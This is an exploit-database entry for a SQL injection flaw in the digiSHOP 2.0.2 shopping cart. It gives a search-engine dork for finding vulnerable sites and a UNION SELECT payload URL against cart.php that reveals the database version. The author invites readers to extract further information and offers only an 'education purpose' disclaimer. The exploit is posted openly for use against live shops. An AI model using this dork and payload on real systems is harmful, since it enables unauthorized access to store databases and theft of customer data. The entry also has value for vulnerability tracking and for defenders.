digiSHOP 2.0.2 - SQL Injection Vulnerability



EDB-ID: 15405 CVE: 2010-4633 OSVDB-ID: 70223
Author: Silic0n Published: 2010-11-03 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
 
-----------------------------------
		             TM	  |
  ___ ___          _______ 	  |
 |   Y   | ______ |       |	  |
 |.  1   ||______||.|   | |	  |
 |.  _   |        `-|.  |-'	  |
 |:  |   |          |:  |  	  |
 |::.|:. |          |::.|  	  |
 `--- ---'          `---'  	  |
	Private Place Of 0days    |
-----------------------------------
 
^Exploit Title  : 
^Date       	: 23/7/2010
^Vendor Site    : http://digishop.digisoft77.com/
^MOD Version    : digiSHOP 2.0.2
^Author         : Silic0n (science_media017[At]yahoo.com)
^Team Site  	: www.hacking-truths.net
^Dork		: inurl:cart.php?m=features&id=
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o, Belma(sweety) ,Danzel, 
messsy , ,abronsius ,Nova ,ConsoleFx , Exi , Beenu , R4cal , jaya ,@ry@n,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/{Shop path}/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7

MySql Version : 4.1.22-log 

Now Use Brain.Exe (7) To extract the Other information 
this exploit is only education Purpose only ,author or team member is not responsible for any harm

------------------------------------------------------------------------------